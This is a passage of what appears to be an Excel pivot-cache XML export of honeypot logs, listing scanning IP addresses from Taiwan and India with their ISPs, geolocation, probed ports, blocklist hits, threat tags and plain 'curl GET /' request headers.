    <s v="business"/>
    <s v="Kornet"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="None&amp;&amp;connection"/>
    <s v="None&amp;&amp;{Data_TELNET:NA}"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <x v="0"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="::ffff:79b7:4b12"/>
    <s v="None"/>
    <s v="low"/>
    <s v="Low"/>
    <m/>
    <m/>
  </r>
  <r>
    <x v="3708"/>
    <x v="3708"/>
    <s v="122-117-36-249.hinet-ip.hinet.net&amp;&amp;NA"/>
    <x v="0"/>
    <d v="2025-04-01T18:24:52"/>
    <d v="2024-05-29T09:33:50"/>
    <d v="2025-04-01T18:24:52"/>
    <n v="438"/>
    <s v="SQTK_GTDN"/>
    <s v="['attack-source'&amp;&amp; 'attack-target:web'&amp;&amp; 'attack-target:ssh']&amp;&amp;Anonymous Behaviour Observed&amp;&amp;Untrusted Traffic&amp;&amp;Suspicious Web Activity Detected"/>
    <s v="low"/>
    <s v="SMA-LAB_DNS_H19&amp;&amp;SMA-LAB_MT-CPA_H20&amp;&amp;SMA-LAB_DHCP_H20&amp;&amp;SMA-LAB_DNS_H9&amp;&amp;SMA-LAB_MT-CPA_H8&amp;&amp;SMA-LAB_HTTP_H8&amp;&amp;SMA-LAB_TELNET_H6&amp;&amp;SMA-LAB_HTTP_H11&amp;&amp;SMA-LAB_TELNET_H32&amp;&amp;SMA-LAB_TELNET_H40&amp;&amp;SMA-LAB_TELNET_H39&amp;&amp;SMA-LAB_TELNET_H22&amp;&amp;SMA-LAB_TELNET_HC1&amp;&amp;SMA-LAB_TELNET_H44&amp;&amp;SMA-LAB_TELNET_H45&amp;&amp;SMA-LAB_TELNET_H26&amp;&amp;SMA-LAB_TELNET_H37&amp;&amp;SMA-LAB_HTTP_H14&amp;&amp;SMA-LAB_TELNET_H18&amp;&amp;SMA-LAB_TELNET_H46&amp;&amp;SMA-LAB_TELNET_H41&amp;&amp;SMA-LAB_TELNET_H7&amp;&amp;SMA-LAB_TELNET_H38&amp;&amp;SMA-LAB_TELNET_H17&amp;&amp;SMA-LAB_TELNET_H24&amp;&amp;SMA-LAB_TELNET_H21&amp;&amp;SMA-LAB_TELNET_H31"/>
    <s v="53&amp;&amp;137&amp;&amp;67&amp;&amp;53&amp;&amp;24642&amp;&amp;80&amp;&amp;23&amp;&amp;NA&amp;&amp;9100&amp;&amp;62440"/>
    <s v="True"/>
    <s v="{'all.s5h.net': ['unknown']&amp;&amp; 'cbl.abuseat.org': ['unknown']}"/>
    <n v="61"/>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NA&amp;&amp;login&amp;&amp;GET"/>
    <s v="NA&amp;&amp;{Data_TELNET:NA}&amp;&amp;{Data_PJL:NA}&amp;&amp;{Data_HTTP:{'Accept': '*/*', 'Connection': 'close', 'Host': '144.126.148.5:80', 'User-Agent': 'curl/7.88.1', 'method': 'GET', 'uri': '/'}}&amp;&amp;{Data_HTTP:NA}&amp;&amp;{Data_HTTP:{'Accept': '*/*', 'Connection': 'close', 'Host': '149.102.153.168:80', 'User-Agent': 'curl/7.88.1', 'method': 'GET', 'uri': '/'}}&amp;&amp;{Data_HTTP:{'Accept': '*/*', 'Connection': 'close', 'Host': '154.26.156.60:80', 'User-Agent': 'curl/7.88.1', 'method': 'GET', 'uri': '/'}}"/>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7a75:24f9"/>
    <s v="C-I_D"/>
    <s v="high&amp;&amp;low"/>
    <s v="Low"/>
    <m/>
    <m/>
  </r>
  <r>
    <x v="3709"/>
    <x v="3709"/>
    <s v="NA"/>
    <x v="0"/>
    <d v="2025-04-01T18:15:26"/>
    <d v="2025-04-01T11:47:40"/>
    <d v="2025-04-01T18:15:26"/>
    <n v="2"/>
    <s v="SQTK_GTDN"/>
    <s v="Untrusted Traffic&amp;&amp;Anonymous Behaviour Observed"/>
    <s v="high"/>
    <s v="SMA-LAB_TELNET_HC1&amp;&amp;SMA-LAB_TELNET_H23"/>
    <s v="23"/>
    <s v="False"/>
    <s v="NA"/>
    <n v="0"/>
    <s v="False"/>
    <s v="False"/>
    <s v="NA"/>
    <s v="low"/>
    <s v="Untrusted Traffic"/>
    <s v="AS"/>
    <s v="Asia"/>
    <s v="IN"/>
    <s v="India"/>
    <s v="MH"/>
    <s v="Maharashtra"/>
    <s v="Mumbai"/>
    <s v="Mumbai (Parel)"/>
    <s v="1275339"/>
    <s v="400012"/>
    <s v="19.0027"/>
    <s v="72.8286"/>
    <s v="17488"/>
    <s v="HATHWAY CABLE AND DATACOM LIMITED"/>
    <s v="Hathway IP over Cable Internet Access"/>
    <s v="residential"/>
    <s v="Hathway Cable and Datacom Limited"/>
    <s v="2008-07-25"/>
    <s v="HATHWAY-NET"/>
    <s v="None"/>
    <s v="connection"/>
    <s v="{Data_TELNET:NA}"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <x v="0"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="::ffff:7361:7535"/>
    <s v="C-I"/>
    <s v="low"/>
    <s v="Low"/>
    <m/>
    <m/>
  </r>
  <r>
    <x v="3710"/>
    <x v="3710"/>
    <s v="218-161-88-19.hinet-ip.hinet.net&amp;&amp;NA"/>
    <x v="0"/>
    <d v="2025-04-01T17:52:52"/>
    <d v="2024-12-28T10:42:33"/>
    <d v="2025-04-01T17:52:52"/>
    <n v="442"/>
    <s v="SQTK_GTDN"/>
    <s v="Untrusted Traffic&amp;&amp;Anonymous Behaviour Observed"/>
    <s v="low"/>
    <s v="SMA-LAB_TELNET_H45&amp;&amp;SMA-LAB_TELNET_H34&amp;&amp;SMA-LAB_TELNET_H14&amp;&amp;SMA-LAB_TELNET_H32&amp;&amp;SMA-LAB_TELNET_H38&amp;&amp;SMA-LAB_TELNET_H12&amp;&amp;SMA-LAB_TELNET_H15&amp;&amp;SMA-LAB_TELNET_H2&amp;&amp;SMA-LAB_TELNET_H25&amp;&amp;SMA-LAB_TELNET_H9&amp;&amp;SMA-LAB_TELNET_HC1&amp;&amp;SMA-LAB_TELNET_H17&amp;&amp;SMA-LAB_TELNET_H10&amp;&amp;SMA-LAB_TELNET_H19&amp;&amp;SMA-LAB_TELNET_H23&amp;&amp;SMA-LAB_TELNET_H11&amp;&amp;SMA-LAB_TELNET_H46&amp;&amp;SMA-LAB_TELNET_H37"/>
    <s v="23&amp;&amp;NA&amp;&amp;80&amp;&amp;9100"/>
    <s v="False"/>
    <s v="NA"/>
    <n v="0"/>
    <s v="False"/>
    <s v="False"/>
    <s v="NA"/>
    <s v="low"/>
    <s v="Untrusted Traffic"/>
    <s v="AS"/>
    <s v="Asia"/>
    <s v="TW"/>
    <s v="Taiwan"/>
    <s v="NA"/>
    <s v="Taiwan"/>
    <s v="Taipei City"/>
    <s v="Neihu District"/>
    <s v="1671467"/>
    <s v="NA"/>
    <s v="25.0689"/>
    <s v="121.591"/>
    <s v="3462"/>
    <s v="Chunghwa Telecom Co., Ltd."/>
    <s v="Chunghwa Telecom Co., Ltd."/>
    <s v="business"/>
    <s v="Chunghwa Telecom Co. Ltd."/>
    <s v="2001-10-09"/>
    <s v="HINET-NET"/>
    <s v="None"/>
    <s v="connection&amp;&amp;login&amp;&amp;NA&amp;&amp;GET"/>
    <s v="NA&amp;&amp;{Data_TELNET:NA}&amp;&amp;{Data_HTTP:{'Accept': '*/*', 'Connection': 'close', 'Host': '144.126.148.5:80', 'User-Agent': 'curl/7.88.1', 'method': 'GET', 'uri': '/'}}&amp;&amp;{Data_HTTP:NA}&amp;&amp;{Data_PJL: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daa1:5813"/>
    <s v="C-I_D"/>
    <s v="low"/>
    <s v="Low"/>
    <m/>
    <m/>
  </r>
  <r>
    <x v="3711"/>
    <x v="3711"/>
    <s v="NA"/>
    <x v="0"/>
    <d v="2025-04-01T17:52:31"/>
    <d v="2025-04-01T17:52:31"/>
    <d v="2025-04-01T17:52:31"/>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b:d143"/>
    <s v="C-I"/>
    <s v="low"/>
    <s v="Low"/>
    <m/>
    <m/>
  </r>
  <r>
    <x v="3712"/>
    <x v="3712"/>
    <s v="NA&amp;&amp;114-34-18-147.hinet-ip.hinet.net"/>
    <x v="0"/>
    <d v="2025-04-01T17:48:31"/>
    <d v="2023-08-14T12:35:08"/>
    <d v="2025-04-01T17:48:31"/>
    <n v="607"/>
    <s v="SQTK_GTDN"/>
    <s v="['attack-source'&amp;&amp; 'attack-target:web'&amp;&amp; 'attack-target:ssh']&amp;&amp;Suspicious Web Activity Detected&amp;&amp;Untrusted Traffic&amp;&amp;Anonymous Behaviour Observed"/>
    <s v="low"/>
    <s v="SMA-LAB_DNS_H19&amp;&amp;SMA-LAB_MT-CPA_H20&amp;&amp;SMA-LAB_DHCP_H20&amp;&amp;SMA-LAB_MSSQL_H32&amp;&amp;SMA-LAB_SMB_H39&amp;&amp;SMA-LAB_MT-CPA_H18&amp;&amp;SMA-LAB_TELNET_H6&amp;&amp;SMA-LAB_TELNET_H32&amp;&amp;SMA-LAB_TELNET_H4&amp;&amp;SMA-LAB_TELNET_H45&amp;&amp;SMA-LAB_TELNET_HC1&amp;&amp;SMA-LAB_TELNET_H17&amp;&amp;SMA-LAB_TELNET_H8&amp;&amp;SMA-LAB_HTTP_H22&amp;&amp;SMA-LAB_TELNET_H47&amp;&amp;SMA-LAB_TELNET_H41&amp;&amp;SMA-LAB_TELNET_H37"/>
    <s v="53&amp;&amp;137&amp;&amp;67&amp;&amp;1433&amp;&amp;445&amp;&amp;4082&amp;&amp;23&amp;&amp;80&amp;&amp;9100"/>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GET"/>
    <s v="NA&amp;&amp;{Data_TELNET:NA}&amp;&amp;{Data_HTTP:{'Accept': '*/*', 'Connection': 'close', 'Host': '38.60.209.6:80', 'User-Agent': 'curl/7.88.1', 'method': 'GET', 'uri': '/'}}&amp;&amp;{Data_HTTP:NA}&amp;&amp;{Data_HTTP:{'Accept': '*/*', 'Connection': 'close', 'Host': '94.131.113.33:80', 'User-Agent': 'curl/7.88.1', 'method': 'GET', 'uri': '/'}}&amp;&amp;{Data_PJL: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7222:1293"/>
    <s v="C-I_D"/>
    <s v="high&amp;&amp;low"/>
    <s v="Low"/>
    <m/>
    <m/>
  </r>
  <r>
    <x v="3713"/>
    <x v="3713"/>
    <s v="NA"/>
    <x v="0"/>
    <d v="2025-04-01T17:47:58"/>
    <d v="2025-04-01T17:47:58"/>
    <d v="2025-04-01T17:47:58"/>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1:31ab"/>
    <s v="C-I"/>
    <s v="low"/>
    <s v="Low"/>
    <m/>
    <m/>
  </r>
  <r>
    <x v="3714"/>
    <x v="3714"/>
    <s v="220-134-19-210.hinet-ip.hinet.net&amp;&amp;NA"/>
    <x v="0"/>
    <d v="2025-04-01T17:45:12"/>
    <d v="2023-08-02T09:27:00"/>
    <d v="2025-04-01T17:45:12"/>
    <n v="1642"/>
    <s v="SQTK_GTDN"/>
    <s v="['attack-source'&amp;&amp; 'attack-target:web']&amp;&amp;Suspicious Web Activity Detected"/>
    <s v="low"/>
    <s v="SMA-LAB_DNS_H19&amp;&amp;SMA-LAB_MT-CPA_H20&amp;&amp;SMA-LAB_DHCP_H20&amp;&amp;SMA-LAB_SSH_H41&amp;&amp;SMA-LAB_DNS_H29&amp;&amp;SMA-LAB_PJL_H14&amp;&amp;SMA-LAB_LDAP_H27&amp;&amp;SMA-LAB_SMB_H20&amp;&amp;SMA-LAB_SOCKS5_H35&amp;&amp;SMA-LAB_VNC_H1&amp;&amp;SMA-LAB_HTTP_H19&amp;&amp;SMA-LAB_NTP_H33&amp;&amp;SMA-LAB_MT-CPA_H22&amp;&amp;SMA-LAB_TELNET_H8&amp;&amp;SMA-LAB_TELNET_H45&amp;&amp;SMA-LAB_TELNET_H29&amp;&amp;SMA-LAB_TELNET_H5&amp;&amp;SMA-LAB_TELNET_H30&amp;&amp;SMA-LAB_TELNET_H27&amp;&amp;SMA-LAB_TELNET_H15&amp;&amp;SMA-LAB_TELNET_H18&amp;&amp;SMA-LAB_TELNET_H17&amp;&amp;SMA-LAB_TELNET_H16&amp;&amp;SMA-LAB_TELNET_H19&amp;&amp;SMA-LAB_TELNET_H46&amp;&amp;SMA-LAB_TELNET_H11&amp;&amp;SMA-LAB_TELNET_H41&amp;&amp;SMA-LAB_TELNET_H40&amp;&amp;SMA-LAB_TELNET_H21&amp;&amp;SMA-LAB_TELNET_H38&amp;&amp;SMA-LAB_TELNET_H6&amp;&amp;SMA-LAB_TELNET_H37&amp;&amp;SMA-LAB_TELNET_H33&amp;&amp;SMA-LAB_TELNET_H13&amp;&amp;SMA-LAB_TELNET_H44&amp;&amp;SMA-LAB_TELNET_H24&amp;&amp;SMA-LAB_TELNET_H26&amp;&amp;SMA-LAB_TELNET_HC1&amp;&amp;SMA-LAB_TELNET_H32&amp;&amp;SMA-LAB_TELNET_H23&amp;&amp;SMA-LAB_MT-CPA_H27"/>
    <s v="53&amp;&amp;137&amp;&amp;67&amp;&amp;22&amp;&amp;53&amp;&amp;9100&amp;&amp;389&amp;&amp;445&amp;&amp;1080&amp;&amp;5900&amp;&amp;80&amp;&amp;123&amp;&amp;29239&amp;&amp;56390&amp;&amp;56408&amp;&amp;12243&amp;&amp;23&amp;&amp;NA"/>
    <s v="False"/>
    <s v="NA"/>
    <n v="0"/>
    <s v="False"/>
    <s v="False"/>
    <s v="NA"/>
    <s v="low"/>
    <s v="['attack-source'&amp;&amp; 'attack-target:web']"/>
    <s v="AS"/>
    <s v="Asia"/>
    <s v="TW"/>
    <s v="Taiwan"/>
    <s v="NA"/>
    <s v="Taiwan"/>
    <s v="Taipei City"/>
    <s v="Taipei"/>
    <s v="1668341"/>
    <s v="NA"/>
    <s v="25.0334"/>
    <s v="121.566"/>
    <s v="3462"/>
    <s v="Chunghwa Telecom Co., Ltd."/>
    <s v="Chunghwa Telecom Co., Ltd."/>
    <s v="business"/>
    <s v="Chunghwa Telecom Co. Ltd."/>
    <s v="2003-06-09"/>
    <s v="HINET-NET"/>
    <s v="None"/>
    <s v="connection&amp;&amp;GET&amp;&amp;login&amp;&amp;NA"/>
    <s v="NA&amp;&amp;{Data_TELNET:NA}&amp;&amp;{Data_HTTP:{'Accept': '*/*', 'Connection': 'close', 'Host': '154.26.156.60:80', 'User-Agent': 'curl/7.88.1', 'method': 'GET', 'uri': '/'}}&amp;&amp;{Data_HTTP:NA}&amp;&amp;{Data_HTTP:{'Accept': '*/*', 'Connection': 'close', 'Host': '185.74.222.213:80', 'User-Agent': 'curl/7.88.1', 'method': 'GET', 'uri': '/'}}&amp;&amp;{Data_PJL:NA}&amp;&amp;{Data_HTTP:{'Accept': '*/*', 'Connection': 'close', 'Host': '144.126.148.5:80', 'User-Agent': 'curl/7.88.1', 'method': 'GET', 'uri': '/'}}&amp;&amp;{Data_HTTP:{'Accept': '*/*', 'Connection': 'close', 'Host': '193.57.136.113:80', 'User-Agent': 'curl/7.88.1', 'method': 'GET', 'uri': '/'}}&amp;&amp;{Data_HTTP:{'Accept': '*/*', 'Connection': 'close', 'Host': '149.102.153.168:80', 'User-Agent': 'curl/7.88.1', 'method': 'GET', 'uri': '/'}}"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <x v="0"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="::ffff:dc86:13d2"/>
    <s v="C-I_D"/>
    <s v="high"/>
    <s v="Low"/>
    <m/>
    <m/>
  </r>
  <r>
    <x v="3715"/>
    <x v="3715"/>
    <s v="NA"/>
    <x v="0"/>
    <d v="2025-04-01T17:44:34"/>
    <d v="2024-12-12T13:10:56"/>
    <d v="2025-04-01T17:44:34"/>
    <n v="2"/>
    <s v="SQTK_GTDN"/>
    <s v="HoneyPot BlackListed IP&amp;&amp;Anonymous Behaviour Observed&amp;&amp;Untrusted Traffic"/>
    <s v="low"/>
    <s v="SMA-LAB_TELNET_H24&amp;&amp;SMA-LAB_TELNET_HC1"/>
    <s v="23"/>
    <s v="True"/>
    <s v="{'zen.spamhaus.org': ['unknown']}"/>
    <n v="33"/>
    <s v="False"/>
    <s v="False"/>
    <s v="NA"/>
    <s v="low"/>
    <s v="Untrusted Traffic"/>
    <s v="AS"/>
    <s v="Asia"/>
    <s v="IN"/>
    <s v="India"/>
    <s v="MH"/>
    <s v="Maharashtra"/>
    <s v="Mumbai Suburban"/>
    <s v="Mumbai"/>
    <s v="1275339"/>
    <s v="400001"/>
    <s v="19.076"/>
    <s v="72.8777"/>
    <s v="9829"/>
    <s v="Bharat Sanchar Nigam Ltd"/>
    <s v="MTNL Mumbai"/>
    <s v="business"/>
    <s v="Mahanagar Telephone Nigam Limited"/>
    <s v="2004-11-30"/>
    <s v="MTNL"/>
    <s v="None"/>
    <s v="connection"/>
    <s v="{Data_TELNET:NA}"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <x v="0"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="::ffff:3bb6:718a"/>
    <s v="None"/>
    <s v="low"/>
    <s v="Low"/>
    <m/>
    <m/>
  </r>
  <r>
    <x v="3716"/>
    <x v="3716"/>
    <s v="NA&amp;&amp;114-33-108-83.hinet-ip.hinet.net"/>
    <x v="0"/>
    <d v="2025-04-01T17:29:35"/>
    <d v="2023-12-06T11:29:00"/>
    <d v="2025-04-01T17:29:35"/>
    <n v="1410"/>
    <s v="SQTK_GTDN"/>
    <s v="['attack-source'&amp;&amp; 'attack-target:web']&amp;&amp;Anonymous Behaviour Observed&amp;&amp;Untrusted Traffic&amp;&amp;Suspicious Web Activity Detected"/>
    <s v="low"/>
    <s v="SMA-LAB_DNS_H19&amp;&amp;SMA-LAB_MT-CPA_H20&amp;&amp;SMA-LAB_DHCP_H20&amp;&amp;SMA-LAB_MT-CPA_H40&amp;&amp;SMA-LAB_TELNET_H8&amp;&amp;SMA-LAB_TELNET_H7&amp;&amp;SMA-LAB_TELNET_H15&amp;&amp;SMA-LAB_TELNET_H9&amp;&amp;SMA-LAB_TELNET_H19&amp;&amp;SMA-LAB_TELNET_H41&amp;&amp;SMA-LAB_TELNET_H37&amp;&amp;SMA-LAB_TELNET_H21&amp;&amp;SMA-LAB_TELNET_H11&amp;&amp;SMA-LAB_TELNET_H18&amp;&amp;SMA-LAB_TELNET_H13&amp;&amp;SMA-LAB_TELNET_H16&amp;&amp;SMA-LAB_TELNET_H26&amp;&amp;SMA-LAB_TELNET_H6&amp;&amp;SMA-LAB_TELNET_H28&amp;&amp;SMA-LAB_TELNET_H23&amp;&amp;SMA-LAB_TELNET_H10&amp;&amp;SMA-LAB_TELNET_H29&amp;&amp;SMA-LAB_TELNET_H12&amp;&amp;SMA-LAB_TELNET_H33&amp;&amp;SMA-LAB_TELNET_H14&amp;&amp;SMA-LAB_TELNET_H45&amp;&amp;SMA-LAB_TELNET_H39&amp;&amp;SMA-LAB_TELNET_H38&amp;&amp;SMA-LAB_TELNET_H22&amp;&amp;SMA-LAB_TELNET_H40&amp;&amp;SMA-LAB_TELNET_HC1"/>
    <s v="53&amp;&amp;137&amp;&amp;67&amp;&amp;42689&amp;&amp;23&amp;&amp;9100&amp;&amp;80&amp;&amp;NA&amp;&amp;51196"/>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2008-04-18"/>
    <s v="HINET-NET"/>
    <s v="None"/>
    <s v="connection&amp;&amp;login&amp;&amp;GET&amp;&amp;NA"/>
    <s v="NA&amp;&amp;{Data_TELNET:NA}&amp;&amp;{Data_PJL:NA}&amp;&amp;{Data_HTTP:{'Accept': '*/*', 'Connection': 'close', 'Host': '185.250.150.39:80', 'User-Agent': 'curl/7.88.1', 'method': 'GET', 'uri': '/'}}&amp;&amp;{Data_HTTP:NA}&amp;&amp;{Data_HTTP:{'Accept': '*/*', 'Connection': 'close', 'Host': '38.54.117.64:80', 'User-Agent': 'curl/7.88.1', 'method': 'GET', 'uri': '/'}}&amp;&amp;{Data_HTTP:{'Accept': '*/*', 'Connection': 'close', 'Host': '154.26.156.60:80', 'User-Agent': 'curl/7.88.1', 'method': 'GET', 'uri': '/'}}"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <x v="0"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="::ffff:7221:6c53"/>
    <s v="C-I_D"/>
    <s v="high&amp;&amp;low"/>
    <s v="Low"/>
    <m/>
    <m/>
  </r>
  <r>
    <x v="3717"/>
    <x v="3717"/>
    <s v="NA&amp;&amp;220-132-17-202.hinet-ip.hinet.net"/>
    <x v="0"/>
    <d v="2025-04-01T17:26:42"/>
    <d v="2024-12-15T07:22:56"/>
    <d v="2025-04-01T17:26:42"/>
    <n v="215"/>
    <s v="SQTK_GTDN"/>
    <s v="Untrusted Traffic&amp;&amp;Anonymous Behaviour Observed"/>
    <s v="low"/>
    <s v="SMA-LAB_TELNET_H38&amp;&amp;SMA-LAB_TELNET_H26&amp;&amp;SMA-LAB_TELNET_H27&amp;&amp;SMA-LAB_TELNET_H40&amp;&amp;SMA-LAB_TELNET_H17&amp;&amp;SMA-LAB_TELNET_H32&amp;&amp;SMA-LAB_TELNET_H24&amp;&amp;SMA-LAB_TELNET_H14&amp;&amp;SMA-LAB_TELNET_H22&amp;&amp;SMA-LAB_TELNET_H45&amp;&amp;SMA-LAB_TELNET_H15&amp;&amp;SMA-LAB_TELNET_H19&amp;&amp;SMA-LAB_TELNET_H39&amp;&amp;SMA-LAB_TELNET_H10&amp;&amp;SMA-LAB_TELNET_H47&amp;&amp;SMA-LAB_TELNET_H34&amp;&amp;SMA-LAB_TELNET_HC1&amp;&amp;SMA-LAB_TELNET_H8"/>
    <s v="23&amp;&amp;30115&amp;&amp;NA&amp;&amp;9100"/>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login&amp;&amp;connection&amp;&amp;NA"/>
    <s v="NA&amp;&amp;{Data_TELNET:NA}&amp;&amp;{Data_PJL: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dc84:11ca"/>
    <s v="C-I_D"/>
    <s v="low"/>
    <s v="Low"/>
    <m/>
    <m/>
  </r>
  <r>
    <x v="3718"/>
    <x v="3718"/>
    <s v="NA&amp;&amp;125-229-14-67.hinet-ip.hinet.net"/>
    <x v="0"/>
    <d v="2025-04-01T17:16:29"/>
    <d v="2024-04-15T11:43:02"/>
    <d v="2025-04-01T17:16:29"/>
    <n v="187"/>
    <s v="SQTK_GTDN"/>
    <s v="['attack-source'&amp;&amp; 'attack-target:web'&amp;&amp; 'attack-target:ssh']&amp;&amp;Anonymous Behaviour Observed&amp;&amp;Untrusted Traffic"/>
    <s v="low"/>
    <s v="SMA-LAB_DNS_H19&amp;&amp;SMA-LAB_MT-CPA_H20&amp;&amp;SMA-LAB_DHCP_H20&amp;&amp;SMA-LAB_HTTP_H11&amp;&amp;SMA-LAB_HTTP_H16&amp;&amp;SMA-LAB_MT-CPA_H6&amp;&amp;SMA-LAB_HTTP_H9&amp;&amp;SMA-LAB_TELNET_H39&amp;&amp;SMA-LAB_TELNET_H10&amp;&amp;SMA-LAB_TELNET_H38&amp;&amp;SMA-LAB_TELNET_H47&amp;&amp;SMA-LAB_TELNET_H22&amp;&amp;SMA-LAB_TELNET_H14&amp;&amp;SMA-LAB_TELNET_H35&amp;&amp;SMA-LAB_TELNET_H36&amp;&amp;SMA-LAB_TELNET_H34&amp;&amp;SMA-LAB_TELNET_H44&amp;&amp;SMA-LAB_TELNET_H8&amp;&amp;SMA-LAB_TELNET_H28&amp;&amp;SMA-LAB_TELNET_H21&amp;&amp;SMA-LAB_TELNET_HC1&amp;&amp;SMA-LAB_TELNET_H15&amp;&amp;SMA-LAB_MT-CPA_H11&amp;&amp;SMA-LAB_TELNET_H40&amp;&amp;SMA-LAB_TELNET_H18&amp;&amp;SMA-LAB_TELNET_H33"/>
    <s v="53&amp;&amp;137&amp;&amp;67&amp;&amp;80&amp;&amp;31072&amp;&amp;23&amp;&amp;5937&amp;&amp;48762&amp;&amp;9100"/>
    <s v="True"/>
    <s v="{'b.barracudacentral.org': ['unknown']}"/>
    <n v="39"/>
    <s v="False"/>
    <s v="False"/>
    <s v="NA"/>
    <s v="low"/>
    <s v="Untrusted Traffic"/>
    <s v="AS"/>
    <s v="Asia"/>
    <s v="TW"/>
    <s v="Taiwan"/>
    <s v="NA"/>
    <s v="Taiwan"/>
    <s v="Taipei City"/>
    <s v="Taipei"/>
    <s v="1668341"/>
    <s v="NA"/>
    <s v="25.0334"/>
    <s v="121.566"/>
    <s v="3462"/>
    <s v="Chunghwa Telecom Co., Ltd."/>
    <s v="Chunghwa Telecom Co., Ltd."/>
    <s v="business"/>
    <s v="Chunghwa Telecom Co. Ltd."/>
    <s v="2005-10-18"/>
    <s v="HINET-NET"/>
    <s v="None"/>
    <s v="connection&amp;&amp;login"/>
    <s v="NA&amp;&amp;{Data_TELNET:NA}&amp;&amp;{Data_PJL:NA}"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <x v="0"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="::ffff:7de5:e43"/>
    <s v="C-I_D"/>
    <s v="high&amp;&amp;low"/>
    <s v="Low"/>
    <m/>
    <m/>
  </r>
  <r>
    <x v="3719"/>
    <x v="3719"/>
    <s v="NA"/>
    <x v="0"/>
    <d v="2025-04-01T17:12:43"/>
    <d v="2025-04-01T17:12:43"/>
    <d v="2025-04-01T17:12:43"/>
    <n v="1"/>
    <s v="SQTK_GTDN"/>
    <s v="Untrusted Traffic&amp;&amp;Anonymous Behaviour Observed"/>
    <s v="low"/>
    <s v="SMA-LAB_TELNET_HC1"/>
    <s v="23"/>
    <s v="True"/>
    <s v="{'b.barracudacentral.org': ['unknown']&amp;&amp; 'zen.spamhaus.org': ['unknown']}"/>
    <n v="73"/>
    <s v="False"/>
    <s v="False"/>
    <s v="NA"/>
    <s v="low"/>
    <s v="Untrusted Traffic"/>
    <s v="AS"/>
    <s v="Asia"/>
    <s v="IN"/>
    <s v="India"/>
    <s v="MH"/>
    <s v="Maharashtra"/>
    <s v="Mumbai Suburban"/>
    <s v="Mumbai"/>
    <s v="1275339"/>
    <s v="400001"/>
    <s v="19.076"/>
    <s v="72.8777"/>
    <s v="9829"/>
    <s v="BSNL-NIB"/>
    <s v="MTNL Pool Through BSNL"/>
    <s v="corporate"/>
    <s v="Mahanagar Telephone Nigam Limited"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="connection"/>
    <s v="{Data_TELNET:NA}"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <x v="0"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="::ffff:783d:5e73"/>
    <s v="C-I"/>
    <s v="low"/>
    <s v="Low"/>
    <m/>
    <m/>
  </r>
  <r>
    <x v="3720"/>
    <x v="3720"/>
    <s v="NA"/>
    <x v="0"/>
    <d v="2025-04-01T17:04:33"/>
    <d v="2025-04-01T17:02:28"/>
    <d v="2025-04-01T17:04:33"/>
    <n v="3"/>
    <s v="SQTK_GTDN"/>
    <s v="Untrusted Traffic&amp;&amp;Anonymous Behaviour Observed"/>
    <s v="high"/>
    <s v="SMA-LAB_MSSQL_HC1"/>
    <s v="1433"/>
    <s v="False"/>
    <s v="NA"/>
    <n v="0"/>
    <s v="False"/>
    <s v="False"/>
    <s v="NA"/>
    <s v="low"/>
    <s v="Untrusted Traffic"/>
    <s v="AS"/>
    <s v="Asia"/>
    <s v="IN"/>
    <s v="India"/>
    <s v="TN"/>
    <s v="Tamil Nadu"/>
    <s v="Chengalpattu"/>
    <s v="Injambakkam"/>
    <s v="9212569"/>
    <s v="NA"/>
    <s v="12.9162"/>
    <s v="80.2488"/>
    <s v="55836"/>
    <s v="Reliance Jio Infocomm Limited"/>
    <s v="RELIANCEJIO"/>
    <s v="cellular"/>
    <s v="Reliance Jio Infocomm Limited"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="connection&amp;&amp;login"/>
    <s v="{Data_MSSQl:NA}"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <x v="0"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="::ffff:983b:dd4d"/>
    <s v="C-I"/>
    <s v="low"/>
    <s v="Low"/>
    <m/>
    <m/>
  </r>
  <r>
    <x v="3721"/>
    <x v="3721"/>
    <s v="NA"/>
    <x v="0"/>
